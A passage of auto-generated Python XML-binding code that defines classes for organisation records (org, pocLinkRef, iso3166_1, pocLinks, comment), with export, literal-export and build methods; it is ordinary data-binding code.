return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace, name, pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class org(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, city=None, iso3166_1=None, dbaName=None, pocLinks=None, handle=None, orgName=None, orgUrl=None, postalCode=None, comment=None, registrationDate=None, iso3166_2=None, streetAddress=None, taxId=None, anytypeobjs_=None):
if city is None:
self.city = []
else:
self.city = city
if iso3166_1 is None:
self.iso3166_1 = []
else:
self.iso3166_1 = iso3166_1
if dbaName is None:
self.dbaName = []
else:
self.dbaName = dbaName
if pocLinks is None:
self.pocLinks = []
else:
self.pocLinks = pocLinks
if handle is None:
self.handle = []
else:
self.handle = handle
if orgName is None:
self.orgName = []
else:
self.orgName = orgName
if orgUrl is None:
self.orgUrl = []
else:
self.orgUrl = orgUrl
if postalCode is None:
self.postalCode = []
else:
self.postalCode = postalCode
if comment is None:
self.comment = []
else:
self.comment = comment
if registrationDate is None:
self.registrationDate = []
else:
self.registrationDate = registrationDate
if iso3166_2 is None:
self.iso3166_2 = []
else:
self.iso3166_2 = iso3166_2
if streetAddress is None:
self.streetAddress = []
else:
self.streetAddress = streetAddress
if taxId is None:
self.taxId = []
else:
self.taxId = taxId
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if org.subclass:
return org.subclass(*args_, **kwargs_)
else:
return org(*args_, **kwargs_)
factory = staticmethod(factory)
def get_city(self): return self.city
def set_city(self, city): self.city = city
def add_city(self, value): self.city.append(value)
def insert_city(self, index, value): self.city[index] = value
def get_iso3166_1(self): return self.iso3166_1
def set_iso3166_1(self, iso3166_1): self.iso3166_1 = iso3166_1
def add_iso3166_1(self, value): self.iso3166_1.append(value)
def insert_iso3166_1(self, index, value): self.iso3166_1[index] = value
def get_dbaName(self): return self.dbaName
def set_dbaName(self, dbaName): self.dbaName = dbaName
def add_dbaName(self, value): self.dbaName.append(value)
def insert_dbaName(self, index, value): self.dbaName[index] = value
def get_pocLinks(self): return self.pocLinks
def set_pocLinks(self, pocLinks): self.pocLinks = pocLinks
def add_pocLinks(self, value): self.pocLinks.append(value)
def insert_pocLinks(self, index, value): self.pocLinks[index] = value
def get_handle(self): return self.handle
def set_handle(self, handle): self.handle = handle
def add_handle(self, value): self.handle.append(value)
def insert_handle(self, index, value): self.handle[index] = value
def get_orgName(self): return self.orgName
def set_orgName(self, orgName): self.orgName = orgName
def add_orgName(self, value): self.orgName.append(value)
def insert_orgName(self, index, value): self.orgName[index] = value
def get_orgUrl(self): return self.orgUrl
def set_orgUrl(self, orgUrl): self.orgUrl = orgUrl
def add_orgUrl(self, value): self.orgUrl.append(value)
def insert_orgUrl(self, index, value): self.orgUrl[index] = value
def get_postalCode(self): return self.postalCode
def set_postalCode(self, postalCode): self.postalCode = postalCode
def add_postalCode(self, value): self.postalCode.append(value)
def insert_postalCode(self, index, value): self.postalCode[index] = value
def get_comment(self): return self.comment
def set_comment(self, comment): self.comment = comment
def add_comment(self, value): self.comment.append(value)
def insert_comment(self, index, value): self.comment[index] = value
def get_registrationDate(self): return self.registrationDate
def set_registrationDate(self, registrationDate): self.registrationDate = registrationDate
def add_registrationDate(self, value): self.registrationDate.append(value)
def insert_registrationDate(self, index, value): self.registrationDate[index] = value
def get_iso3166_2(self): return self.iso3166_2
def set_iso3166_2(self, iso3166_2): self.iso3166_2 = iso3166_2
def add_iso3166_2(self, value): self.iso3166_2.append(value)
def insert_iso3166_2(self, index, value): self.iso3166_2[index] = value
def get_streetAddress(self): return self.streetAddress
def set_streetAddress(self, streetAddress): self.streetAddress = streetAddress
def add_streetAddress(self, value): self.streetAddress.append(value)
def insert_streetAddress(self, index, value): self.streetAddress[index] = value
def get_taxId(self): return self.taxId
def set_taxId(self, taxId): self.taxId = taxId
def add_taxId(self, value): self.taxId.append(value)
def insert_taxId(self, index, value): self.taxId[index] = value
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.city or
self.iso3166_1 or
self.dbaName or
self.pocLinks or
self.handle or
self.orgName or
self.orgUrl or
self.postalCode or
self.comment or
self.registrationDate or
self.iso3166_2 or
self.streetAddress or
self.taxId or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='org', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='org')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='org'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='org', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for city_ in self.city:
showIndent(outfile, level, pretty_print)
outfile.write('<%scity>%s</%scity>%s' % (namespace_, self.gds_format_string(quote_xml(city_).encode(ExternalEncoding), input_name='city'), namespace_, eol_))
for iso3166_1_ in self.iso3166_1:
iso3166_1_.export(outfile, level, namespace_, name_='iso3166-1', pretty_print=pretty_print)
for dbaName_ in self.dbaName:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdbaName>%s</%sdbaName>%s' % (namespace_, self.gds_format_string(quote_xml(dbaName_).encode(ExternalEncoding), input_name='dbaName'), namespace_, eol_))
for pocLinks_ in self.pocLinks:
pocLinks_.export(outfile, level, namespace_, name_='pocLinks', pretty_print=pretty_print)
for handle_ in self.handle:
showIndent(outfile, level, pretty_print)
outfile.write('<%shandle>%s</%shandle>%s' % (namespace_, self.gds_format_string(quote_xml(handle_).encode(ExternalEncoding), input_name='handle'), namespace_, eol_))
for orgName_ in self.orgName:
showIndent(outfile, level, pretty_print)
outfile.write('<%sorgName>%s</%sorgName>%s' % (namespace_, self.gds_format_string(quote_xml(orgName_).encode(ExternalEncoding), input_name='orgName'), namespace_, eol_))
for orgUrl_ in self.orgUrl:
showIndent(outfile, level, pretty_print)
outfile.write('<%sorgUrl>%s</%sorgUrl>%s' % (namespace_, self.gds_format_string(quote_xml(orgUrl_).encode(ExternalEncoding), input_name='orgUrl'), namespace_, eol_))
for postalCode_ in self.postalCode:
showIndent(outfile, level, pretty_print)
outfile.write('<%spostalCode>%s</%spostalCode>%s' % (namespace_, self.gds_format_string(quote_xml(postalCode_).encode(ExternalEncoding), input_name='postalCode'), namespace_, eol_))
for comment_ in self.comment:
comment_.export(outfile, level, namespace_, name_='comment', pretty_print=pretty_print)
for registrationDate_ in self.registrationDate:
showIndent(outfile, level, pretty_print)
outfile.write('<%sregistrationDate>%s</%sregistrationDate>%s' % (namespace_, self.gds_format_string(quote_xml(registrationDate_).encode(ExternalEncoding), input_name='registrationDate'), namespace_, eol_))
for iso3166_2_ in self.iso3166_2:
showIndent(outfile, level, pretty_print)
outfile.write('<%siso3166-2>%s</%siso3166-2>%s' % (namespace_, self.gds_format_string(quote_xml(iso3166_2_).encode(ExternalEncoding), input_name='iso3166-2'), namespace_, eol_))
for streetAddress_ in self.streetAddress:
streetAddress_.export(outfile, level, namespace_, name_='streetAddress', pretty_print=pretty_print)
for taxId_ in self.taxId:
showIndent(outfile, level, pretty_print)
outfile.write('<%staxId>%s</%staxId>%s' % (namespace_, self.gds_format_string(quote_xml(taxId_).encode(ExternalEncoding), input_name='taxId'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='org'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('city=[\n')
level += 1
for city_ in self.city:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(city_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('iso3166_1=[\n')
level += 1
for iso3166_1_ in self.iso3166_1:
showIndent(outfile, level)
outfile.write('model_.iso3166_1(\n')
iso3166_1_.exportLiteral(outfile, level, name_='iso3166-1')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('dbaName=[\n')
level += 1
for dbaName_ in self.dbaName:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(dbaName_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('pocLinks=[\n')
level += 1
for pocLinks_ in self.pocLinks:
showIndent(outfile, level)
outfile.write('model_.pocLinks(\n')
pocLinks_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('handle=[\n')
level += 1
for handle_ in self.handle:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(handle_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('orgName=[\n')
level += 1
for orgName_ in self.orgName:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(orgName_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('orgUrl=[\n')
level += 1
for orgUrl_ in self.orgUrl:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(orgUrl_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('postalCode=[\n')
level += 1
for postalCode_ in self.postalCode:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(postalCode_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('comment=[\n')
level += 1
for comment_ in self.comment:
showIndent(outfile, level)
outfile.write('model_.comment(\n')
comment_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('registrationDate=[\n')
level += 1
for registrationDate_ in self.registrationDate:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(registrationDate_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('iso3166_2=[\n')
level += 1
for iso3166_2_ in self.iso3166_2:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(iso3166_2_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('streetAddress=[\n')
level += 1
for streetAddress_ in self.streetAddress:
showIndent(outfile, level)
outfile.write('model_.streetAddress(\n')
streetAddress_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('taxId=[\n')
level += 1
for taxId_ in self.taxId:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(taxId_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'city':
city_ = child_.text
city_ = self.gds_validate_string(city_, node, 'city')
self.city.append(city_)
elif nodeName_ == 'iso3166-1':
obj_ = iso3166_1.factory()
obj_.build(child_)
self.iso3166_1.append(obj_)
elif nodeName_ == 'dbaName':
dbaName_ = child_.text
dbaName_ = self.gds_validate_string(dbaName_, node, 'dbaName')
self.dbaName.append(dbaName_)
elif nodeName_ == 'pocLinks':
obj_ = pocLinks.factory()
obj_.build(child_)
self.pocLinks.append(obj_)
elif nodeName_ == 'handle':
handle_ = child_.text
handle_ = self.gds_validate_string(handle_, node, 'handle')
self.handle.append(handle_)
elif nodeName_ == 'orgName':
orgName_ = child_.text
orgName_ = self.gds_validate_string(orgName_, node, 'orgName')
self.orgName.append(orgName_)
elif nodeName_ == 'orgUrl':
orgUrl_ = child_.text
orgUrl_ = self.gds_validate_string(orgUrl_, node, 'orgUrl')
self.orgUrl.append(orgUrl_)
elif nodeName_ == 'postalCode':
postalCode_ = child_.text
postalCode_ = self.gds_validate_string(postalCode_, node, 'postalCode')
self.postalCode.append(postalCode_)
elif nodeName_ == 'comment':
obj_ = comment.factory()
obj_.build(child_)
self.comment.append(obj_)
elif nodeName_ == 'registrationDate':
registrationDate_ = child_.text
registrationDate_ = self.gds_validate_string(registrationDate_, node, 'registrationDate')
self.registrationDate.append(registrationDate_)
elif nodeName_ == 'iso3166-2':
iso3166_2_ = child_.text
iso3166_2_ = self.gds_validate_string(iso3166_2_, node, 'iso3166_2')
self.iso3166_2.append(iso3166_2_)
elif nodeName_ == 'streetAddress':
obj_ = streetAddress.factory()
obj_.build(child_)
self.streetAddress.append(obj_)
elif nodeName_ == 'taxId':
taxId_ = child_.text
taxId_ = self.gds_validate_string(taxId_, node, 'taxId')
self.taxId.append(taxId_)
else:
obj_ = self.gds_build_any(child_, 'org')
if obj_ is not None:
self.set_anytypeobjs_(obj_)
# end class org
class pocLinkRef(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, function=None, handle=None, description=None):
self.function = _cast(None, function)
self.handle = _cast(None, handle)
self.description = _cast(None, description)
pass
def factory(*args_, **kwargs_):
if pocLinkRef.subclass:
return pocLinkRef.subclass(*args_, **kwargs_)
else:
return pocLinkRef(*args_, **kwargs_)
factory = staticmethod(factory)
def get_function(self): return self.function
def set_function(self, function): self.function = function
def get_handle(self): return self.handle
def set_handle(self, handle): self.handle = handle
def get_description(self): return self.description
def set_description(self, description): self.description = description
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='pocLinkRef', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='pocLinkRef')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='pocLinkRef'):
if self.function is not None and 'function' not in already_processed:
already_processed.add('function')
outfile.write(' function=%s' % (self.gds_format_string(quote_attrib(self.function).encode(ExternalEncoding), input_name='function'), ))
if self.handle is not None and 'handle' not in already_processed:
already_processed.add('handle')
outfile.write(' handle=%s' % (self.gds_format_string(quote_attrib(self.handle).encode(ExternalEncoding), input_name='handle'), ))
if self.description is not None and 'description' not in already_processed:
already_processed.add('description')
outfile.write(' description=%s' % (self.gds_format_string(quote_attrib(self.description).encode(ExternalEncoding), input_name='description'), ))
def exportChildren(self, outfile, level, namespace_='v1:', name_='pocLinkRef', fromsubclass_=False, pretty_print=True):
pass
def exportLiteral(self, outfile, level, name_='pocLinkRef'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.function is not None and 'function' not in already_processed:
already_processed.add('function')
showIndent(outfile, level)
outfile.write('function="%s",\n' % (self.function,))
if self.handle is not None and 'handle' not in already_processed:
already_processed.add('handle')
showIndent(outfile, level)
outfile.write('handle="%s",\n' % (self.handle,))
if self.description is not None and 'description' not in already_processed:
already_processed.add('description')
showIndent(outfile, level)
outfile.write('description="%s",\n' % (self.description,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('function', node)
if value is not None and 'function' not in already_processed:
already_processed.add('function')
self.function = value
value = find_attr_value_('handle', node)
if value is not None and 'handle' not in already_processed:
already_processed.add('handle')
self.handle = value
value = find_attr_value_('description', node)
if value is not None and 'description' not in already_processed:
already_processed.add('description')
self.description = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class pocLinkRef
class iso3166_1(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, code2=None, code3=None, name=None, e164=None, anytypeobjs_=None):
if code2 is None:
self.code2 = []
else:
self.code2 = code2
if code3 is None:
self.code3 = []
else:
self.code3 = code3
if name is None:
self.name = []
else:
self.name = name
if e164 is None:
self.e164 = []
else:
self.e164 = e164
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if iso3166_1.subclass:
return iso3166_1.subclass(*args_, **kwargs_)
else:
return iso3166_1(*args_, **kwargs_)
factory = staticmethod(factory)
def get_code2(self): return self.code2
def set_code2(self, code2): self.code2 = code2
def add_code2(self, value): self.code2.append(value)
def insert_code2(self, index, value): self.code2[index] = value
def get_code3(self): return self.code3
def set_code3(self, code3): self.code3 = code3
def add_code3(self, value): self.code3.append(value)
def insert_code3(self, index, value): self.code3[index] = value
def get_name(self): return self.name
def set_name(self, name): self.name = name
def add_name(self, value): self.name.append(value)
def insert_name(self, index, value): self.name[index] = value
def get_e164(self): return self.e164
def set_e164(self, e164): self.e164 = e164
def add_e164(self, value): self.e164.append(value)
def insert_e164(self, index, value): self.e164[index] = value
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.code2 or
self.code3 or
self.name or
self.e164 or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='iso3166-1', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='iso3166-1')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='iso3166-1'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='iso3166-1', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for code2_ in self.code2:
showIndent(outfile, level, pretty_print)
outfile.write('<%scode2>%s</%scode2>%s' % (namespace_, self.gds_format_string(quote_xml(code2_).encode(ExternalEncoding), input_name='code2'), namespace_, eol_))
for code3_ in self.code3:
showIndent(outfile, level, pretty_print)
outfile.write('<%scode3>%s</%scode3>%s' % (namespace_, self.gds_format_string(quote_xml(code3_).encode(ExternalEncoding), input_name='code3'), namespace_, eol_))
for name_ in self.name:
showIndent(outfile, level, pretty_print)
outfile.write('<%sname>%s</%sname>%s' % (namespace_, self.gds_format_string(quote_xml(name_).encode(ExternalEncoding), input_name='name'), namespace_, eol_))
for e164_ in self.e164:
showIndent(outfile, level, pretty_print)
outfile.write('<%se164>%s</%se164>%s' % (namespace_, self.gds_format_string(quote_xml(e164_).encode(ExternalEncoding), input_name='e164'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='iso3166-1'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('code2=[\n')
level += 1
for code2_ in self.code2:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(code2_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('code3=[\n')
level += 1
for code3_ in self.code3:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(code3_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('name=[\n')
level += 1
for name_ in self.name:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(name_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('e164=[\n')
level += 1
for e164_ in self.e164:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(e164_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'code2':
code2_ = child_.text
code2_ = self.gds_validate_string(code2_, node, 'code2')
self.code2.append(code2_)
elif nodeName_ == 'code3':
code3_ = child_.text
code3_ = self.gds_validate_string(code3_, node, 'code3')
self.code3.append(code3_)
elif nodeName_ == 'name':
name_ = child_.text
name_ = self.gds_validate_string(name_, node, 'name')
self.name.append(name_)
elif nodeName_ == 'e164':
e164_ = child_.text
e164_ = self.gds_validate_string(e164_, node, 'e164')
self.e164.append(e164_)
else:
obj_ = self.gds_build_any(child_, 'iso3166-1')
if obj_ is not None:
self.set_anytypeobjs_(obj_)
# end class iso3166_1
class pocLinks(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, pocLinkRef=None):
if pocLinkRef is None:
self.pocLinkRef = []
else:
self.pocLinkRef = pocLinkRef
def factory(*args_, **kwargs_):
if pocLinks.subclass:
return pocLinks.subclass(*args_, **kwargs_)
else:
return pocLinks(*args_, **kwargs_)
factory = staticmethod(factory)
def get_pocLinkRef(self): return self.pocLinkRef
def set_pocLinkRef(self, pocLinkRef): self.pocLinkRef = pocLinkRef
def add_pocLinkRef(self, value): self.pocLinkRef.append(value)
def insert_pocLinkRef(self, index, value): self.pocLinkRef[index] = value
def hasContent_(self):
if (
self.pocLinkRef
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='pocLinks', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='pocLinks')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='pocLinks'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='pocLinks', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for pocLinkRef_ in self.pocLinkRef:
pocLinkRef_.export(outfile, level, namespace_, name_='pocLinkRef', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='pocLinks'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('pocLinkRef=[\n')
level += 1
for pocLinkRef_ in self.pocLinkRef:
showIndent(outfile, level)
outfile.write('model_.pocLinkRef(\n')
pocLinkRef_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'pocLinkRef':
obj_ = pocLinkRef.factory()
obj_.build(child_)
self.pocLinkRef.append(obj_)
# end class pocLinks
class comment(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, line=None):
if line is None:
self.line = []
else:
self.line = line
def factory(*args_, **kwargs_):
if comment.subclass:
return comment.subclass(*args_, **kwargs_)
else:
return comment(*args_, **kwargs_)
factory = staticmethod(factory)
def get_line(self): return self.line
def set_line(self, line): self.line = line
def add_line(self, value): self.line.append(value)
def insert_line(self, index, value): self.line[index] = value
def hasContent_(self):
if (
self.line
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='comment', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='comment')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
